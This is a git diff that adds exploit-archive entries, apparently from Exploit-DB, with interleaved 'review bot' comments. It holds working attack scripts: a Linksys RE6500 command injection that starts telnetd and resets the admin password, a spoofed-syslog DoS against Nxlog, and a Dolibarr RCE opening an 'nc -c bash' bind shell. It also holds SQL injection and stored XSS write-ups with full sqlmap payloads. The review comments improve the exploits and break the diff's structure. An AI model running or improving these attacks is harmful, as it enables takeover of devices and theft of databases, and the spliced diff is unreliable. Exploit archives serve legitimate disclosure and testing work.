diff --git a/exploits/hardware/webapps/49270.py b/exploits/hardware/webapps/49270.py
new file mode 100755
index 000000000..93f9c27ed
--- /dev/null
+++ b/exploits/hardware/webapps/49270.py
@@ -0,0 +1,54 @@
+# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
+# Date: 31/07/2020
+# Exploit Author: RE-Solver
+# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
+# Vendor Homepage: www.linksys.com
+# Version: FW V1.05 up to FW v1.0.11.001
+# Tested on: FW V1.05 up to FW v1.0.11.001
+# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
+# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
+# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.
+
+#!/usr/bin/env python
+
+from requests import Session
+import requests
+import os
+print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
+print("Tested on FW V1.05 up to FW v1.0.11.001")
+print("RE-Solver @solver_re")
+ip="192.168.1.226"
+
+command="nvram_get Password >/tmp/lastpwd"
+#save device password;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r= s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+ print("[+] Prev password saved in /tmp/lastpwd")
+
+command="busybox telnetd"
+#start telnetd;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+ print("[+] Telnet Enabled")
+
+#set admin password 
+post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+ print("[+] Prevent corrupting nvram - set a new password= admin")
\ No newline at end of file
diff --git a/exploits/multiple/dos/49283.txt b/exploits/multiple/dos/49283.txt
new file mode 100644
index 000000000..4de592ae7
--- /dev/null
+++ b/exploits/multiple/dos/49283.txt
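Review bot: Each `if r.status_code == 200:` prints a success message on any HTTP 200, which says nothing about whether the injected shell fragment actually ran — `[+] Telnet Enabled` should be backed by a real check such as a TCP connect to port 23 after the `busybox telnetd` post, and `[+] Prev password saved` by reading `/tmp/lastpwd` back once telnet is up. The three request blocks are copies of one another and `post_data` is a hand-built string, so `>`, `;` and spaces are sent unencoded; a small helper that takes the command and passes a dict lets requests encode the body (assuming the goform handler decodes percent-encoding like an ordinary form parser — verify on a device) and needs only `import socket` for the port check. The header should state plainly that the script is destructive — it starts an unauthenticated telnetd and resets the admin password to `admin`, leaving the previous one only in `/tmp/lastpwd` on the extender — and `ip` should be a CLI argument rather than the hard-coded `192.168.1.226`. Minor: `#!/usr/bin/env python` is not on line 1 so it has no effect, and `from requests import Session` and `import os` are unused.
```python
def inject(session, ip, command):
    """POST one shell fragment through the unauthenticated /goform/setSysAdm handler."""
    payload = {"admuser": "admin", "admpass": ";" + command + ";",
               "admpasshint": "61646D696E=", "AuthTimeout": "600",
               "wirelessMgmt_http": "1"}
    return session.post("http://" + ip + "/goform/setSysAdm", data=payload)

def telnet_open(ip, timeout=3):
    """True only if something accepts a connection on tcp/23 - the real success signal."""
    try:
        with socket.create_connection((ip, 23), timeout=timeout):
            return True
    except OSError:
        return False

# ... unchanged: banner prints, session set-up with Origin/Referer headers ...
inject(s, ip, "nvram_get Password >/tmp/lastpwd")
inject(s, ip, "busybox telnetd")
print("[+] Telnet Enabled" if telnet_open(ip) else "[-] tcp/23 closed - injection may have failed")
```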
@@ -0,0 +1,46 @@
+# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
+# Date: 15/12/2020
+# Exploit Author: Guillaume PETIT
+# Vendor Homepage: https://nxlog.co
+# Software Link: https://nxlog.co/products/nxlog-community-edition/download
+# Version: 2.10.2150
+# Tested on: Linux Debian 10 && Windows Server 2019
+
+#!/usr/bin/python3
+
+import sys
+import time
+import argparse
+from scapy.all import *
+
+def getPayload(args):
+ # IF UNIX
+ if (args.OS == 1):
+ return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
+ # IF WINDOWS
+ elif (args.OS == 2):
+ return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
+
+ # Test
+ elif (args.OS == 3):
+ return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
+
+def runExploit(args,payload):
+ priority = 30
+ message = payload
+ syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
+ send(syslog,verbose=args.DEBUG)
+
+def getArguments():
+ parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
+ parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
+ parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
+ parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
+ parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
+ return parser.parse_args()
+
+def main():
+ args = getArguments()
+ payload = getPayload(args)
+ runExploit(args,payload)
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
index 06ea8299c..ed29dab88 100644
--- a/exploits/php/webapps/49209.txt
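Review bot: `getPayload` falls through and returns `None` for any `-os` value other than 1, 2 or 3, so `runExploit` dies with a TypeError inside `"<" + str(priority) + ">" + message` instead of a usable error; add `choices=(1, 2, 3)` to the `-os` `add_argument` call (and `choices=(0, 1)` for `-d`) so argparse rejects bad input up front. The datagram is sent at layer 3 from a forged source `192.168.1.10`, which requires root, is dropped by egress filtering on most networks, and leaves an unattributable entry in the target's logs — for an authorized test expose `src` as an argument that defaults to the real interface address rather than a hard-coded spoof. The header says only "DoS (Poc)": it should state the observed effect (process exit, hang, or input no longer processed) and why `..` and `CON` were chosen as hostnames — the values suggest the hostname ends up in a file path, but nothing in the file says so — so the result can be reproduced and confirmed. Minor: `#!/usr/bin/python3` after the comment block has no effect, `sys` and `time` are unused, and `main()` should be guarded by `if __name__ == "__main__":`.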
+++ b/exploits/php/webapps/49209.txt
@@ -5,6 +5,7 @@
 # Tested on: Windows 10
 # Web Browser: Mozilla Firefox & Opera
 # Google Dorks: "Powered by vBulletin® Version 5.6.3"
+# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html
 Go to the "Admin CP" - click on "Styles" - click "Style Manager" - Choose "Denim" or other theme and choose action "Add new template" and
diff --git a/exploits/php/webapps/49269.py b/exploits/php/webapps/49269.py
new file mode 100755
index 000000000..41e8c2dff
--- /dev/null
+++ b/exploits/php/webapps/49269.py
@@ -0,0 +1,77 @@
+# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
+# Date: 2020.12.17
+# Exploit Author: Yilmaz Degirmenci
+# Vendor Homepage: https://github.com/Dolibarr/dolibarr
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 12.0.3
+# Tested on: Kali Linux 2020.2
+
+# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
+# vulnerable to authenticated Remote Code Execution Attack. An attacker who
+# has the access the admin dashboard can manipulate the backup function by
+# inserting payload into the zipfilename_template parameter at page
+# /admin/tools/dolibarr_export.php by clicking on the button "Generate
+# Backup" thus triggering command injection on target system.
+
+import requests
+from bs4 import BeautifulSoup
+from bs4 import Comment
+import re
+import lxml
+import json
+import urllib
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.0.15/ --> ")
+
+print("Exploit is sent! Check out if the bind shell on port 9999 active!")
+
+listener_port = "9999"
+
+login_url = root_url + "/index.php?mainmenu=home "
+vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
+upload_url = root_url + "/admin/tools/export_files.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the token value
+soup = BeautifulSoup(request.text,"lxml")
+token = soup.find("input",{'name':'token'})['value']
+
+# Login
+body = {"token":token, "actionlogin":"login",
+"loginfunction":"loginfunction", "tz":"-5",
+"tz_string":"America%2FNew_York", "dst_observed":"1",
+"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
+"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
+"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
+"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
+"dol_use_jmobile":"", "username":username,"password":password}
+
+session.post(login_url, data=body, cookies=request.cookies)
+
+request = session.get(vulnerable_url)
+token = soup.find("input",{'name':'token'})['value']
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"Origin": root_url,
+"Referer":
+root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
+"Upgrade-Insecure-Requests": "1"
+}
+
+body = {"token":token, "export_type":"server", "page_y":"1039",
+"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
+--use-compress-program='nc -c bash -nlvp 9999' %0a :: ",
+"compression":"gz"}
+
+param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
+
+session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
\ No newline at end of file
diff --git a/exploits/php/webapps/49271.txt b/exploits/php/webapps/49271.txt
new file mode 100644
index 000000000..8a1238606
--- /dev/null
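Review bot: Two string literals are split across source lines in this hunk — the `User-Agent` value continues on `+Gecko/20100101 Firefox/80.0",` and the `zipfilename_template` value on `+--use-compress-program='nc -c bash -nlvp 9999' %0a :: ",` — and Python does not allow a raw newline inside a quoted string, so the file as committed should fail to parse; join them (or use implicit concatenation of two literals) and confirm the checked-in copy actually runs. After `request = session.get(vulnerable_url)` the token is read from the stale `soup` built from the login page, so the export form's own CSRF token is never extracted — insert `soup = BeautifulSoup(request.text, "lxml")` before the second `token = soup.find(...)`. The final `session.post(upload_url, data=body, params=param, ...)` sends the injection twice, once in the body and once in the query string via `params`, where it is typically recorded in web-server access logs; drop `params=param` (and the unused `listener_port`, `Comment`, `re`, `lxml`, `json` imports, the trailing space in `login_url`, and fix `"Accept":"*/"` to `*/*`). Note also that the payload opens an unauthenticated bind shell (`nc -c bash -nlvp 9999`) reachable by anyone who can reach the host, and that the login response is never checked before the export request is sent; a reverse shell to a tester-controlled listener is the safer default on an engagement.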
+++ b/exploits/php/webapps/49271.txt
@@ -0,0 +1,14 @@
+# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: WINDOWS 10
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name to
+"".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
diff --git a/exploits/php/webapps/49272.txt b/exploits/php/webapps/49272.txt
new file mode 100644
index 000000000..0d737b0ed
--- /dev/null
+++ b/exploits/php/webapps/49272.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login"
+page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=login HTTP/1.1
+Host: 10.211.55.4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 61
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://10.211.55.4
+Referer: http://10.211.55.4/login.php
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
+---
+
+SQLMAP
+---
+Parameter: email (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND
+'WlxU'='WlxU&password=admin123
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM
+(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49273.txt b/exploits/php/webapps/49273.txt
new file mode 100644
index 000000000..db43ac797
--- /dev/null
+++ b/exploits/php/webapps/49273.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "
+http://127.0.0.1/ajax.php?action=load_list" page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=load_list HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 63
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://127.0.0.1
+Referer:
+http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
+---
+
+SQLMAP
+---
+Parameter: id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689
+AND 'ZPQO'='ZPQO&start=0
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT
+6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 10 columns
+ Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL
+SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--
+-&start=0
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49274.txt b/exploits/php/webapps/49274.txt
new file mode 100644
index 000000000..d62a45ec6
--- /dev/null
+++ b/exploits/php/webapps/49274.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Select Staff and select the view icon.
+
+Step 3. You will be redirected to a page like "
+http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any
+page that has the "id" parameter. Capture the current page request in
+burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents. 
+
+---
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE
+(SELECT 4035 UNION SELECT 6415) END))
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT
+COUNT(*),CONCAT(0x716b6a7871,(SELECT
+(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: action=edit & id=22 AND (SELECT 4861 FROM
+(SELECT(SLEEP(5)))xiXm)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 9 columns
+ Payload: action=edit & id=22 UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL--
+-
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49275.txt b/exploits/php/webapps/49275.txt
new file mode 100644
index 000000000..c8740df9a
--- /dev/null
+++ b/exploits/php/webapps/49275.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any valid credentials
+
+Step 2. Click on the username in header and select "Manage Account".
+
+Step 3. On "Manage Account" page, insert "" in both the "First Name" & "Last Name" fields.
+
+Step 4. Complete the other required details and click on save to update user information.
+
+Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
\ No newline at end of file
diff --git a/exploits/php/webapps/49276.txt b/exploits/php/webapps/49276.txt
new file mode 100644
index 000000000..e1a407869
--- /dev/null
+++ b/exploits/php/webapps/49276.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on Customer and select list.
+
+Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: page=edit_staff&id=1 AND 4164=4164
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 10 columns
+ Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49277.txt b/exploits/php/webapps/49277.txt
new file mode 100644
index 000000000..eeb81aa67
--- /dev/null
+++ b/exploits/php/webapps/49277.txt
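Review bot: The steps and the evidence disagree: Step 3 has the reader capture `index.php?page=edit_customer&id=2`, while every sqlmap payload quoted below targets `page=edit_staff&id=1`, so the documented 10-column UNION result belongs to a different page than the one the title and steps describe. Either re-run sqlmap against the captured `edit_customer` request and paste that output, or change Step 3 to `http://localhost/index.php?page=edit_staff&id=1` and adjust the title to match. Since Step 1 requires admin credentials, the header should also carry "(Authenticated)" so the severity is not misread as pre-auth.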
@@ -0,0 +1,74 @@
+# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-11
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Bookings" in header and select "Add Bookings".
+
+Step 3. Complete the required details and click on "Save" to save the new Bookings.
+
+Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon.
+
+Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite.
+
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
+
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents. 
+
+---
+
+Parameter: id (GET)
+
+ Type: boolean-based blind
+
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+
+ Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
+
+
+
+ Type: error-based
+
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+
+ Payload: id=2' AND (SELECT 7113 FROM(SELECT
+COUNT(*),CONCAT(0x716a626a71,(SELECT
+(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
+
+
+
+ Type: stacked queries
+
+ Title: MySQL >= 5.0.12 stacked queries (comment)
+
+ Payload: id=2';SELECT SLEEP(5)#
+
+
+
+ Type: time-based blind
+
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+ Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
+
+
+
+ Type: UNION query
+
+ Title: MySQL UNION query (NULL) - 4 columns
+
+
+ Payload: id=-1072' UNION ALL SELECT
+NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
+
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49278.txt b/exploits/php/webapps/49278.txt
new file mode 100644
index 000000000..d997212aa
--- /dev/null
+++ b/exploits/php/webapps/49278.txt
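Review bot: Step 7 describes the impact as information disclosure only, yet the sqlmap output below lists `Type: stacked queries` with payload `id=2';SELECT SLEEP(5)#`; if that finding is genuine, `id` accepts arbitrary additional statements (INSERT/UPDATE/DROP, not just reads) and the advisory should say so. Stacked-query results against PHP/MySQL need manual confirmation before publication, because `mysqli_query()` does not execute multiple statements and sqlmap's time-based stacking check is known to produce false positives — state how it was verified or drop that entry. The payloads also show a quoted string context (`id=2'`), and Step 1 requires admin credentials, so the header should read "(Authenticated)".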
@@ -0,0 +1,22 @@
+# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add New Question Page.
+
+Step 3: input "" in the new question
+field and select add new question.
+
+Step 4: Once you have an XSS payload as a question in add new question
+page, click on View Questions Page.
+
+Step 5: This will trigger the XSS payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/49279.txt b/exploits/php/webapps/49279.txt
new file mode 100644
index 000000000..f720ae655
--- /dev/null
+++ b/exploits/php/webapps/49279.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Click on View Candidates page and select take exam. If there is no
+candidate, click on "Add New Candidate" page, fill details and add new
+candidate.
+
+Step 3. Click on "Take Exam" and capture the request in burpsuite.
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
+UNION SELECT 3372) END))
+
+ Type: stacked queries
+ Title: MySQL >= 5.0.12 stacked queries (comment)
+ Payload: id=1;SELECT SLEEP(5)#
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49280.txt b/exploits/php/webapps/49280.txt
new file mode 100644
index 000000000..ba550882e
--- /dev/null
+++ b/exploits/php/webapps/49280.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-09
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the application with any valid user credentials.
+
+Step 2: Click on Add Employee.
+
+Step 3: input "" in all fields except phone number
+fields. Note: increase the values of "1" in "alert(1)" to determine which
+field is vulnerable. Eg ,
+ ....etc.
+
+Step 4: Once all fields are completed, Click on ADD RECORD to save the
+record.
+
+Step 5: Click on All Employees page and this will trigger the Stored XSS.
+
+Step 6: To view all Stored XSS, after clicking on All Employees page, click
